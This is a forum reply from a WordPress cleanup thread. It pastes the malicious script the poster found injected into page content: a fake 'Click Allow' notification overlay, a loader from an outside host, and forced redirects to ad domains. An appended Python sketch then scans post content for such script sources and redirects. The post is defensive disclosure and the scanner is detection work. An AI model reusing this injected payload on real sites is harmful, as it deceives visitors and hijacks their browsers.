Reply To: Unable to clear redirect malware


#2341

Robert C.
Member

OK, so I ran a find on all WP files, i.e. checked all PHP and JS files, then checked keywords in the WP database using myphp, and found that all the malware scripts have been added to the page content. This was true for another site I cleaned last week.

Here is the embedded script below for your info… Oh, and I had to deactivate the bakery plugin and use classic mode to edit the page in raw/HTML (for reference, the sites were running PHP 7.0 or 1 or 2, they are now all on 7.3, all themes and plugins and WP versions were set to auto update, themes have been popular ones such as Avada, BeTheme, Enfold, TheGem):

<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
<script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>

Hope this helps.

Any tips for prevention gladly received.
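
The post above found the injected scripts inside page content stored in the database rather than in PHP or JS files. As an added example (not part of the original post), this Python sketch scans `(post_id, post_content)` rows for the three patterns visible in the posted script: `<script src=…>` tags, dynamic `.src = …` assignments and `location` redirects, and reports any host not on an allowlist. The allowlist, the function names and the sample rows are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from; adjust per site.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}

# One pattern per way the posted script pulls in or jumps to a remote URL.
PATTERNS = {
    "script-src": re.compile(r"<script\b[^>]*?\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I),
    "dynamic-src": re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]", re.I),
    "redirect": re.compile(
        r"location(?:\.href\s*=|\.(?:replace|assign)\s*\()\s*['\"]([^'\"]+)['\"]", re.I),
}

def host_of(url):
    # Protocol-relative URLs ("//host/path") have no scheme; add one to parse.
    if url.startswith("//"):
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()

def scan_posts(rows, allowed=ALLOWED_HOSTS):
    """rows: iterable of (post_id, post_content). Returns sorted findings."""
    findings = set()
    for post_id, content in rows:
        for kind, rx in PATTERNS.items():
            for url in rx.findall(content):
                host = host_of(url)
                if host and host not in allowed:  # relative URLs have no host
                    findings.add((post_id, kind, host))
    return sorted(findings)

# Constructed sample rows shaped like wp_posts content (not real data).
SAMPLE_ROWS = [
    (11, "<p>About us</p><script src='/wp-includes/js/jquery/jquery.js'></script>"),
    (12, "<p>Hi</p><script src=\"https://cdn.example.com/app.js\"></script>"),
    (42, "<h2>Home</h2><script>const s = document.createElement('script');"
         "s.src='//push.badhost.example/tag.min.js?z=1';"
         "s.onload = (sdk) => {sdk.onPermissionDenied(() => "
         "{window.location.replace(\"//redir.badhost.example/afu.php?zoneid=1\")});};"
         "document.head.appendChild(s);</script>"
         "<script data-cfasync='false' type='text/javascript' "
         "src='//ads.badhost.example/adServe/banners?tid=1'></script>"),
]

if __name__ == "__main__":
    for post_id, kind, host in scan_posts(SAMPLE_ROWS):
        print(f"post {post_id}: {kind} -> {host}")
```

Feed it rows from a database export or query of post content; anything it reports still needs a manual look before the content is edited.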